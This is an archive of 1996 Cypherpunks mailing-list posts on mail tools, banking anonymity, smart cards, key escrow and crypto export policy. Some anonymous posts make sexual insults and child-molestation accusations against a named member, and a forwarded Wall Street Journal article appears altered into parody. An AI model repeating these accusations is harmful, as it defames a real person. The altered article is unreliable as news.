Cooking With Warp 4.0

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------
 
*MR/2 ICE: What I like about MS is its loyalty to customers!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 16 Oct 1996 05:17:00 -0700 (PDT)
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: mail software for multiple addrs
In-Reply-To: <199610160147.SAA09538@netcom2.netcom.com>
Message-ID: <199610161214.HAA00754@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Vladimir Z. Nuri wrote:
> 
> hi everyone. I'm asking this here because I know that cpunks
> spend a lot of time in email. I'm looking for some GUI
> software that can deal well with
> 
> 1. multiple internet providers - i.e., if I have multiple
> providers, I would like the software to be able to easily
> deal with them all, without having to retype IP addresses
> etc. into dialog boxes

it is trivial in Unix, write a TCL/TK script that would give you a 
nice dialog with a pretty button for each connection, and call a
different shell script for each button. That's what I use.
 
> 2. multiple email accounts - i.e. the mail software is not
> going to use merely one POP account, but should be able
> to have different email addrs and passwords over POP

popclient or .forward are your friends.

> 3. multiple mailing lists - I'd like a way to sort incoming
> mail into separate folders/directories based on  header
> fields, and a way to automate this. (i.e. not have to
> go through the same procedure each time of typing the
> fields etc.)

procmail is your friend

> I am aware of Netscape's mail features, which don't really
> handle much of the above.  also, I suspect many people
> require some combination of the above, so there is probably
> software out there to do it.. at least there is a demand.
> 
> also, I'm aware of procmail but would prefer something
> that supports a GUI interface.


	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@USIT.NET>
Date: Wed, 16 Oct 1996 04:37:35 -0700 (PDT)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: More threats from FOTM (Friends of Timmy May)
In-Reply-To: <Pine.SUN.3.91.961015214555.7815A-100000@crl10.crl.com>
Message-ID: <Pine.GSO.3.95.961016073518.7980B-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


Something like "ne(o)cultorney," I think.

bd


On Tue, 15 Oct 1996, Sandy Sandfort wrote:
> 
> Does anyone remember the Russian word for "uncultured"?  It was
> in one or two of Tom Clancy's books.
> 
> 
>  S a n d y
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Shantz <bshantz@nwlink.com>
Date: Wed, 16 Oct 1996 07:54:26 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Microsoft Millionaires and Billionaires
Message-ID: <199610161454.HAA07073@montana.nwlink.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: tcmay@got.net, cypherpunks@toad.com
Date: Wed Oct 16 07:57:02 1996
Tim,

You obviously don't know as many developers at Microsoft as I do.   They 
treat alot of their developers like farm animals.  I just had an interview 
at Microsoft last week.  Very few if any of the people I met with were 
millionaires.

Brad

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMmT3y680j2q8tTgtAQGC7wQA2ris5C3KAD6qLy3AmtglJRoZrei72CIH
MEm7DGasD4AXqfwkjdmvZScAVXRD+KHHgVZQKQp+H0+D/TWHZCN9nrwE1z5/j73R
o8qXDCC0owwJabZHknOMwpBm4Sf6JUGs7Wm1K9JmpVlF01GP+z7rxOMXfvZrlxvy
mwcK3wjIPCU=
=PTmz
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lucifer@dhp.com (Anonymous)
Date: Wed, 16 Oct 1996 05:03:10 -0700 (PDT)
To: cypherpunks@toad.com
Subject: NoneOne-time pads
Message-ID: <199610161200.IAA31307@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


Timmy May's weewee is so tiny that only his mommy is 
allowed to touch it.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bdolan@USIT.NET (Brad Dolan)
Date: Fri, 18 Oct 1996 08:05:18 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: More threats from FOTM (Friends of Timmy May)
Message-ID: <$m2n19346-.Pine.GSO.3.95.961016073518.7980B-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


Something like "ne(o)cultorney," I think.

bd


On Tue, 15 Oct 1996, Sandy Sandfort wrote:
> 
> Does anyone remember the Russian word for "uncultured"?  It was
> in one or two of Tom Clancy's books.
> 
> 
>  S a n d y
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: whgiii@amaranth.com ("William H. Geiger III")
Date: Sat, 19 Oct 1996 10:34:41 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Blinded Identities [was Re: exporting signatures only/CAPI]
Message-ID: <$m2n21036-.199610161232.HAA14016@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <Pine.SUN.3.94.961015211026.16787C-100000@polaris>, on 10/15/96 at 09:20 PM,
   Black Unicorn <unicorn@schloss.li> said:

>On Mon, 14 Oct 1996, William H. Geiger III wrote:

>> In <Pine.SUN.3.94.961014035114.28315K-100000@polaris>, on 10/14/96 at 04:01 AM,
>>    Black Unicorn <unicorn@schloss.li> said:

>> >Banking is as much about confidence as any business can be.  Anonymous or not, the
>> >presence of funds which
>> >infringe on regulations in one area or another are frightening to normal banking
>> >customers.
>> 
>> BULL!!!!
>> 
>> There are only two things the banking customers care about:
>> 
>> 1. Will my money be there in the morning?
>> 
>> 2. What is my rate of return?

>Both of these are affected by large scandals at banks.

scandals=unwarranted media hype.

True scandals of interest to the investment & banking community are along the lines of fraud, theft, embezzlement, poor or risky investment. Items that directly relate to 1 & 2. The S&L debacle in the US during the 80's is a good example.

The rest is just crap to either:

A: Sell more newspapers, and/or

B: Increase government power.

>In the case of the first example, runs on banks are hardly unheard of in relation to
>major and even somewhat minor revelations about the source of deposit funds where
>that source is criminal.  (Again, I cite Union Bank of Switzerland which saw a three
>day run of almost $200 million after
>disclosures about UBS accounts which were used for kidnapping randsom.
>DeBeers was one depositor which explicitly attributed their account
>closures to the news).

>The rate of return is directly affected by costs to the bank.  Legal costs (even in
>Switzerland) of defending against government and private party discovery and
>compelled disclosure are severe.  Need I even discuss the cost to the "legitimate"
>BCCI account holder?

What about the cost to Switzerland's banking industry due to the fact that they nolonger uphold their investors anonyminity?? Their industry has lost Billions due to their cow-towing to US and other governments snooping into investors accounts. What "cost" does that have to the account holders of their banks??

>And if customers are unconcerned about elements ther than #1 and #2,
>why are such pains taken to invest in offshore institutions where the
>costs (in sweat alone) can be higher?

Because it is justified by avoiding government interference in their financial activities which in the long run increases their rate of return well above the added cost of doing so.

>> The rest of it is a bunch of Govenment & Media hype & bull shit!!

>The above incidents are easily found with a quick trip to the library.

<sigh> Why so I can re-read the unwarranted media & government attacks on banking institutions because, god forbid, they actually took someone's money without running them over the coals first. Dam those nasty banks all to hell, they don't report every transaction of their investors to every government that may be interested.  

>The bottom line is that until anonyminity is not seen as some kind of
>invariably criminal act with respect to banking, legitimate and
>illegitimate money will be as like charged particles.

No the bottom line is money is money. Their is no such thing as "legitimate" or "illegitimate" money. Banks should not be forced to play policemen, their job is processing money.

Next time, get a CLUE.

>Next time, stick to web consulting.
 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Who died an made you god of the banking industry?? Last time I looked Walter Wriston was still alive and well. :) (Incase you are too clueless to know who that is I am sure a trip to your local library should help.)

--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Cooking With Warp 4.0

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------
 
*MR/2 ICE: What I like about MS is its loyalty to customers!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 16 Oct 1996 14:30:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: More threats from FOTM (Friends of Timmy May)
In-Reply-To: <Pine.SUN.3.91.961015214555.7815A-100000@crl10.crl.com>
Message-ID: <VX7VVD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort <sandfort@crl.com> writes:
> Does anyone remember the Russian word for "uncultured"?  It was
> in one or two of Tom Clancy's books.

I think you mean "nekulturny" - "not affiliated with soc.culture.russian".

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Wed, 16 Oct 1996 09:08:06 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199610161608.JAA21295@fat.doobie.com>
MIME-Version: 1.0
Content-Type: text/plain


:Given how Timmy C[rook] May's propensity to molest little children, :is it any surprise that the state of California wants to have him 
:castrated?

Despite the off-topic interruptions and obvious cruelty to Tim (still a gentleman) May, I must confess to enjoying the dark humor in remarks such as this! Gotta laff!
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 16 Oct 1996 14:48:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [NEWS] Crypto-relevant wire clippings
Message-ID: <Z39VVD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


American Banker: Friday, October 11, 1996

Smart Card Venture, Once Written Off, Is Perking Up

By VALERIE BLOCK

SmartCash, a high-profile smart card venture that many industry observers had
left for dead, is showing signs of life.

The turnabout is so complete, according to some sources, that Visa
International may buy the system.

People close to SmartCash -- it was formed in August 1995 by 11 major U.S.
banks, MasterCard International, Verifone Inc., and the French smart card
maker Gemplus -- say it has completed development of an operating system and
is attracting renewed industry interest.

With MasterCard closing in on an acquisition agreement with Mondex, the
smart-card-based electronic cash system developed by Natwest Group of London,
Visa is said to be looking closely at SmartCash.

Visa refused to comment on the speculation, but a spokesman said, "We have
been in longstanding discussions with SmartCash since day one." He said Visa
has had "a number of discussions with a variety of vendors."

But outsiders are freely throwing Visa's name around. It is part of the same
flurry of rumors that has American Express Co. taking a hard look at Proton, a
smart card system developed by Banksys, the Belgian national payments
association.

"Visa is interested in SmartCash," said Dan Cunningham, a former Gemplus
executive who is senior vice president of Phoenix Planning and Evaluation, a
Rockville, Md.-based consulting firm.

Though Visa's stored value card system, Visa Cash, has been trumpeted as a
viable application of chip technology, "SmartCash is more robust," said a
knowledgeable source who requested anonymity. Visa Cash was built on the
Danmont operating system, which was designed for Denmark, a tiny market
compared to the United States.

SmartCash, with a membership nucleus that included the owners of Electronic
Payment Services Inc., began last year with much fanfare. But by April this
year, executive departures, bickering among the bankers, and the lack of an
operating system left an impression of disarray, and the alliance appeared to
have dissolved.

Electronic Payment Services, owner of the MAC automated teller machine
network, quietly stayed the course. Its operating system completed and
delivered just two weeks ago, Smart Cash "is the only stored value system
developed in the U.S. for the U.S. market," said Donald J. Gleason, president
of the Wilmington, Del., company's smart card enterprise.

SmartCash founders MasterCard, First Union Corp., NationsBank Corp., and Chase
Manhattan Corp. are out. Electronic Payment Services' owners -- Banc One
Corp., CoreStates Financial Corp., KeyCorp, National City Corp., and PNC Bank
Corp.-- are still committed.

Banc One is "still involved with Smart Cash," said a spokesman. "We want to
see it get off the ground and go."

"They've got a very viable solution," said David R. Campbell, executive vice
president of KeyCorp. "It's a matter of whether enough interest can be
generated to put that solution into the marketplace."

With chip cards looking increasingly viable, the stakes are getting higher for
the bank card associations. Visa made a big publicity splash in Atlanta with a
Visa Cash pilot that coincided with the Olympic Games, but the banks are still
waiting for proof of a business case.

MasterCard did not deliver on the expectations of its cash card experiment in
Canberra, Australia.

Sources said it was deemed a "disaster" and led to the negotiations with
Mondex International, the global consortium put together this year by Natwest
Group.

Several executives involved in MasterCard's chip card efforts have departed,
including Robin Townend, Philip Verdi, and Diane Weatherington, head of the
program, who left Oct. 1. Another key technologist, John Tunstall, recently
submitted his resignation, sources said.

American Express Co. is being paired with the Belgian group that has completed
several successful installations in Europe and is supplying the technology for
the Exact smart card pilot in Canada.

Though many smart card systems are getting under way, especially in "closed
systems" such as campuses and athletic venues, creating an open worldwide
system is much more complex, involving a more sophisticated approach to
security, operating standards, access to automated teller networks, interbank
settlement, fraud detection, and other back-office issues. Acquiring a system
that has been proven can reduce a system's time to market and could be far
less costly for banks and their payment associations, industry experts said.
The Mondex system is estimated to have cost $150 million to develop.

Many banks are trying out several systems; most in Australia are in Visa Cash,
MasterCard Cash, and Mondex in hopes of arriving at the most efficient and
cost effective answer.

Also critical in developing an open smart card system is "scalability," the
power to expand and upgrade the hardware and software as new technological
developments occur, without having to reissue cards and terminals.

Danmont, the proven system Visa used for Atlanta, is not "designed to
migrate," a technology expert said. He said the merchant terminals and smart
cards would have to be replaced as heightened security measures are
implemented. That would not fly with merchants, who are a hard sell on the
concept to begin with.

The SmartCash system, which took more than four years to complete, is
expressly designed for a changing marketplace, with modular components that
can be replaced or upgraded. Mr. Gleason called the effort, which suffered
embarrassing delays, "a huge challenge." Trying to recoup the costs by getting
the SmartCash coalition back on track is the organization's next task.

Though Electronic Payment Services would not comment on membership and future
plans, BankAmerica Corp., the big California bank historically aligned with
Visa, is said to be in the group.

Pilots at member banks' offices could be running in early 1997, said Mr.
Cunningham, the consultant.

Martha Campbell, a former Bank of America executive, said both the San
Francisco giant and Visa were active in SmartCash as of August.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Verheul <everheul@NGI.NL>
Date: Wed, 16 Oct 1996 01:43:05 -0700 (PDT)
To: "'Daniel Pouzzner'" <douzzer@lechter.chautauqua.com>
Subject: AW: Binding cryptography - a fraud-detectible alternative to key-escrow
Message-ID: <01BBBB49.244AA8E0@port13.ztm.pstn.rijnhaave.net>
MIME-Version: 1.0
Content-Type: text/plain


On dinsdag 15 oktober 1996 22:48, Daniel Pouzzner[SMTP:douzzer@lechter.chautauqua.com] wrote:
>"Binding cryptography" does not increase the difficulty of subverting
>the key escrow facilities of a messaging system. In order to subvert
>such a system, one can either modify the messaging system (as
>described by leichter@smarts.com, for example), or nest another
>cryptosystem inside it; these techniques are not impeded through the
>introduction of "binding cryptography." There are no easier subversion
>techniques, so "binding cryptography" has zero impact on the viability
>of compulsory key escrow implementations.
I agree that binding cryptography, or any "recovery" system can be subverted
by nesting another cryptosystem into it. However, the advantages gained this way - in my
opinion are small; people wanting to do this might as well use/make their own system.

Compare this with the simple "recovery" system where users are obliged (*if* they voluntarily agree
to *use* the system) to send along a session key encrypted with a public key of a Key Recovery
Agent, and where *no* binding data is required. Then it would be trivial to convert this system
into a criminally useful one - by a simple manipulation in software - with:
- *not* having to build another cryptosystem (and its key-management) into the system;
- packets send can by no means be distinguished by third parties from "correct" ones.

As we liked the flexibility of choice in Key Recovery Agents of this system (which in our
opinion amplifies privacy properties of the scheme) we proposed binding cryptography, as
a middle between non-liberal private key escrow and the too liberal simple "recovery" system. 

>
>I am troubled because your research is misdirected, and because by
>publicizing your research you are serving to cloud what is
>fundamentally a very simple issue. In your announcement you described
>"binding cryptography" as an "alternative to key-escrow." This is
>misleading to the point of falsehood. It is key escrow with even more
>stringent constraints placed upon choice of algorithms and
>architecture.  The idea of escrowing session keys, rather than
>keypairs or passphrases themselves, is hardly new. 
We know, see above.

>The utility of key
>escrow itself is indisputable - for example, it is a clear boon when
>cryptography is used to secure documents in an institutional
>environment. However, your proposed "alternative" adds nothing of
>utility to either users or governments, and erodes the freedom of the
>software architect. I find any architectural imposition repugnant, as
>does any architect whose primary design criterion is quality.
I think that architectural problems with key-escrow systems are more
difficult than that associated with our scheme. The NRC study in fact
raises the question of key-escrow on a large scale is at all possible.

>Those of us who know better should not bicker among ourselves.
>Compulsory key escrow is plainly unethical and mathematically
>untenable. You should be ashamed for every minute you have spent
>devising stratagems by which a public less technically knowledgeable,
>but no less deserving of fundamental rights, can be duped into
>accepting compulsory key escrow thereby abdicating their privacy and
>endangering their safety.  There is no middle ground.
I respect your opinion, but I think there is a middle ground. Maybe you should be
ashamed for not realizing the future problems that arise when even the part of the
Global information superhighway that is paid for by society can be very conveniently
used by criminals to harm society. 

>
>-Daniel Pouzzner
> Software Architect
>
>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 16 Oct 1996 22:54:11 -0700 (PDT)
To: "Bert-Jaap Koops" <cypherpunks@toad.com
Subject: Re: Comment on binding cryptography (2)
Message-ID: <199610170553.WAA11109@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:41 PM 10/16/96 MET, Bert-Jaap Koops wrote:
> I haven't yet made up my mind how the crypto problems for law 
> enforcement are to be addressed. It's my Ph.D. subject, and all I can 
> say at present is that the issue is complex.

Before addressing the problems of crypto, how about addressing the 
problems of opaque envelopes in snail mail.

Opaque envelopes not only facilitate criminal conspiracies in the
same way that crypto does, it also makes possible such things as
letter bombs, which have no crypto equivalent.

The solution:   Mandatory tranparent envelopes.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Wed, 16 Oct 1996 10:15:48 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Japan imposing crypto export restrictions!
In-Reply-To: <199610160435.GAA00926@basement.replay.com>
Message-ID: <199610161715.KAA20655@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



Can anyone confirm this?  This is really scary stuff if the Clinton
administration really succeeded in pulling this off.

Ern

> Another Cypherpunks exclusive!
> 
> Bowing to US pressure, the Japanese Ministry of International Trade
> and Industry (MITI) has quietly made changes to Japanese crypto export
> regulations.
> 
> In the past, export of crypto products from Japan was unregulated. The
> exporter had to file a pro-forma export declaration with MITI. The new
> regulations, imposed in recent weeks without public announcement,
> require the exporter to state the ultimate recipient of the crypto
> product. MITI then conducts a lengthy approval process that can take
> many weeks.
> 
> It is widely assumed that the US used the thread of trade sanctions to
> bring about this 180 degree turn in the attitude of the Japanese
> government.
> 
> The new regulations apply to exports from Japan to all countries,
> including the US.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Wed, 16 Oct 1996 07:26:31 -0700 (PDT)
To: pclow <pclow@pc.jaring.my>
Subject: Re: Royalties
In-Reply-To: <32648F4D.5F75@pc.jaring.my>
Message-ID: <Pine.SCO.3.93.961016101018.11688A-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 16 Oct 1996, pclow wrote:

> Mark O. Aldrich wrote:
> > You cannot commercialize PGP whether you pay Ascom-Tech any royalties or
> > not.  Phil Zimmermann grated an exclusive license to ViaCrypt, Inc. a
> > number of years ago to be the sole commercial version of PGP.  In the mean
> > time, PGP Inc. was formed and has acquired ViaCrypt.  Thus, PGP Inc. now
> > holds the exclusive license on commercial PGP products.
> 
> Even the international version of PGP?
> 

All versions of PGP are owned by PGP Inc.  The international version is
still their product, even if they give it away instead of commercially
sell it.  From what I understand, Ascom Tech requires a license fee if the
product gets sold over in Europe, and I imagine the PGP Inc. will now have
to pay up when they begin to shrink wrap the international version over
there. 

------------------------------------------------------------------------- 
|some people get by                       |        Mark Aldrich         |
|with a little understanding              |   GRCI INFOSEC Engineering  |
|some people get by                       |     maldrich@grci.com       |
|with a whole lot more                    | MAldrich@dockmaster.ncsc.mil|
|               -- Sisters of Mercy       |                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Wed, 16 Oct 1996 10:55:59 -0700 (PDT)
To: stan_gibson@zd.com
Subject: Your editorial in the 10/14 PCWeek
Message-ID: <v03007800ae8ac25fee14@[207.67.246.99]>
MIME-Version: 1.0
Content-Type: text/plain


Mr Gibson --

I'm afraid that I must disagree with your editorial in the October 14th issue of PC Week titled "Encryption Law Change: Good News" <http://www.pcweek.com/opinion/1014/14edit.html>. This is not a good change, but rather another attempt by the government to get it's "key escrow" (now renamed 'key recovery') agenda added to commercial software products.

Let's start with the facts. 

A) This is not a change in the law. There is no law regarding export of encryption software.
Congress has never passed any such law. These are State Department regulations, and presidential decrees. These regulations, which have the force of law to you and me, were never debated or voted upon by our elected representatives. They can be changed tomorrow the same way. In fact, they can be changed and the public need not even be notified.


B) The Clinton administration agreed to allow the export of unescrowed encryption that used 56 bit keys for six months (with up to three six month renewals) on the following conditions:
	1) That the companies shipping the software agree (in principle) to incorporate 'key recovery' features in their software.
	2) That the companies shipping the software make status reports to the government every 6 months as to their progress towards a key recovery scheme. If they are making satisfactory progress, their export license will be renewed for another six months.
	3) That after two years, they discontinue selling their 56 bit software, and only sell the 'key recovery' software.

Condition #1 is what the Clinton Administration has been fighting for since 1993 when it first announced the Clipper chip, the ability to recover the plaintext of any encrypted communication.

Condition #2 puts these companies at the mercy of a government panel which will decide, every six months, whether or not an internal project is proceeding 'satisfactorily'. If not, the company will be unable to sell its' encryption products abroad. This is a _big_ stick that the government can use to influence companies' actions.

Condition #3 requires the companies to obsolete their products in two years, because they will no longer be able to sell the "unescrowed" software abroad, and because one of the goals of "key recovery" is that it will not interoperate with software that does not support "key recovery".


B)
Your editorial states:
>Previous administrations have turned a deaf ear to industry pleas, as 
>had the Clinton administration for three and a half years. Until now, 
>the White House has toed the line drawn by law enforcement officials, 
>which equated powerful encryption technology with munitions. Now, the 
>administration has, under high-tech standard-bearer Vice President Al 
>Gore, done a complete about-face. 
>
Even if this was, as you wrote, a "complete about face", and there were no other conditions (such as key recovery)  involved, it would still be inadequate. A paper written this year by a group of noted cryptologists titled "Minimal Key Lengths for Symmetric Ciphers to Provide Adequate Commercial Security" recommends that the minimum key length for security today was at least 75 bits, and for data that needs to be secured for the next twenty years, at least 90 bit keys should be used.

The entire paper is availiable at <ftp://ftp.research.att.com/dist/mab/keylength.txt> (ASCII) and <ftp://ftp.research.att.com/dist/mab/keylength.ps> (PostScript). It is fascinating reading.


You also wrote:
>The administration plan also calls for private companies to surrender 
>encryption keys should court orders demand them. 
>
This is incomplete and misleading. The original Clipper press release, (availiable at <http://www.epic.org/crypto/clipper/white_house_statement_4_93.txt> ) states:

>Q:   Suppose a law enforcement agency is conducting a wiretap on
>     a drug smuggling ring and intercepts a conversation
>     encrypted using the device.  What would they have to do to
>     decipher the message?
>
>A:   They would have to obtain legal authorization, normally a
>     court order, to do the wiretap in the first place.  They
>     would then present documentation of this authorization to
>     the two entities responsible for safeguarding the keys and
>     obtain the keys for the device being used by the drug
>     smugglers.  The key is split into two parts, which are
>     stored separately in order to ensure the security of the key
>     escrow system.
>
Please note the word "normally".
The Clinton Administration, even though repeatedly asked, has never explained what consitutes an abnormal case, and what they would consider authorization in that case.
This was not a typo. This Q&A was part of an official White House press release.

C) What exactly is "key recovery"? How does it work?
No one knows. The White House press release doesn't say. The idea is that the 11 vendor coalition will work out the methodology, and the White House will "approve" it. This is, in my mind, one of the slickest moves in the whole situation. The administration has taken a problem that they have been unable to solve to the satisfaction of the computer industry (access to all encrypted communications), and suddenly, it's not the administration's problem any more! It's the computer industry's problem!

From an article in a recent ComputerWorld: (<http://www.computerworld.com/search/AT-html/9610/961014SL42crypto.html>)

>And speaking of failures to communicate, take IBM, which recently teamed 
>with 10 companies to develop technology for a "key-recovery" system 
>intended to satisfy the new export criteria.
>
>Through some mysterious process, the scheme will allow the government to 
>get encryption keys when it needs them, without having to hold them "in 
>escrow" the Clipper approach.
>
>Why "mysterious? IBM's press release announcing the initiative was four 
>pages of self-congratulatory drivel with almost no information about 
>what the companies would develop or how it would work.
>
>Reminded of the secret Clipper algorithm, I sought details from IBM. I 
>asked a spokeswoman why the company hadn't just put out a nice, snappy 
>white paper explaining its new approach to key recovery.
>
>"We spent three months trying to do that, quite literally," the 
>spokeswoman said. "It's pretty confusing stuff, and whenever we get it 
>on paper, we aren't happy with it."
>

> Observers believe that if the 56-bit experiment proves successful, 
>relaxation of the restriction that still covers 128-bit key software 
>will follow. This could take place two years hence.
>
Who are these "observers"? They don't seem very observant to me.

The government has stated that the export of unescrowed 56 bit encryption software is a temporary measure, and will be prohibited again (at the very latest) on Jan 1, 1999. At that time, the only (medium or) strong encryption software that will be allowed to be exported will be that which supports "key recovery".


In conclusion, this is not a "refreshing change of direction" for the Clinton administration.  This was "more of the same", albeit better disguised. The 11 companies who signed up for this coalition are receiving very little (56 bit export for at most two years), in exchange for giving up control of their encryption technologies to the government forever.

If hou have any questions, I would be glad to speak to you further.


-- Marshall

Marshall Clow     Aladdin Systems   <mailto:mclow@mailhost2.csusm.edu>

"It is not the function of our Government to keep the citizen from falling
into error; it is the function of the citizen to keep the Government from
falling into error."
--Justice Robert Jackson, _American Communication Association v Douds_,
343 U.S. 306, 325 [1952] [via ed.nelson@SYSLINK.MCS.COM]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 16 Oct 1996 08:11:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: People From Hell
Message-ID: <1.5.4.32.19961016151052.0069c970@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Wall Street Journal, October 16, 1996


   Life Management

   How to Handle Those Nightmare People

   By Timothy D. Schellhardt


   Forget brutish dictators. Enough advice has been dispensed
   about how to cope with them. What today's life manager
   really needs to know is how to handle *people* from hell.

   You probably recognize them: the Constant Complainer; the
   Subversive Sniper; the Busybody; the Goldbricker; and what
   physicians Rick Kirschner and Rick Brinkman, authors of the
   book "Dealing With People You Can't Stand," have dubbed the
   "No" Person, who can 'defeat big ideas with a single
   syllable."

   Interest in how to handle difficult people has been
   heightened in recent years by global restructurings. With
   the elimination of layers of shock absorbers, a growing
   number of threatened people now oversee ever more
   threatened people. Often their new subordinates -- angry at
   a world they no longer trust -- are on-life's-edge
   malcontents. Meanwhile, some people have been thrust into
   life management roles they didn't seek, and many are
   surprised to find how irritating the subordinates they have
   inherited can be.

   "New life managers tell me all the time they just didn't
   realize how challenging this would be," says Anthony
   Urbaniak, a life-marketing professor at Northern State
   University in Aberdeen, S.D., who has taught seminars and
   classes for new life supervisors. He says the supervisors
   frequently want to fire problem people or encourage them to
   suicide. But he argues that "properly coached," such
   discontents "can become well-above-average people."

   Practically every life manager has a least-favorite people
   category. For Diana Freeland, manager of people assistance
   programs at Tenneco Inc.'s Tenneco Energy unit, it's the
   moody person because "you never know what kind of a mood
   that person is going to be in." For Steve Kahn, chief
   executive of Integrity QA Software, a year-old Silicon
   Valley company, it's the person who takes up too much of
   his time unnecessarily. ("I say, 'Give me the short
   version.' Or, 'I've got another 10 minutes on this, so
   let's make sure we get the important stuff done.' Then I
   smile, to avoid being perceived as homicidal.")

   Regardless of the category, it's nearly impossible to
   change people's temperaments, especially if you're
   criticizing them for the way they live. Instead, lifeplace
   experts recommend dealing with the issue of how the person
   is surviving misery. Dr. Kirschner, who practices near
   Portland, Ore., adds that a life manager "has to signal to
   the person behaving badly that you're not against them and
   you're on the same side -- and smile, to avoid being
   perceived as homicidal."

   Here are some of the behavior patterns that are most
   bothersome to a sampling of life managers and lifeplace
   experts, along with some tips on how to handle them.

   + The Constant Complainer

   Symptoms: This person is always whining and often looks for
   problems, imagining them if none exist. Idealistic young
   people, disillusioned by the realities of the world, and
   perfectionists can fall into this category.

   Action Plan: Find out why the person gripes so much. If a
   specific complaint is life-related, decide whether the
   complainer is unable or unwilling to live, suggests Jean
   Getz, a Baton Rouge, La., lifeshop leader on people issues.
   If the person can't bear to live, determine whether more
   training or resources are needed. "If unwilling to live by
   life's rules, the person is history," she says. "And smile,
   to avoid being perceived as homicidal."

   + The Subversive Sniper (a k a the Back-Stabber)

   Symptoms: This person often wants to move up and is looking
   for ways to undermine you or make you look foolish.
   Extremely passive-aggressive, they pretend "to be your best
   friend while sneaking behind your back," says Lillian
   Glass, a Beverly Hills, Calif., communications specialist
   who has written about "toxic" people.

   Action Plan: Make it clear you're aware of the
   Back-Stabber's two-faced ways. "Give 'em orders, lay the
   law down," insists Dee Soder, who counsels senior life
   managers as president of Endymion Co., New York. "Never let
   these people off the hook," agrees Ms. Glass. When one of
   Ms. Soder's clients discovered that a subordinate had
   claimed credit for a successful project with the company's
   chief executive, she laid down rules she expected the
   underling to follow when communicating with the CEO. She
   then told the CEO that while she wanted her people to have
   access to him, she wanted to be told what they were saying.
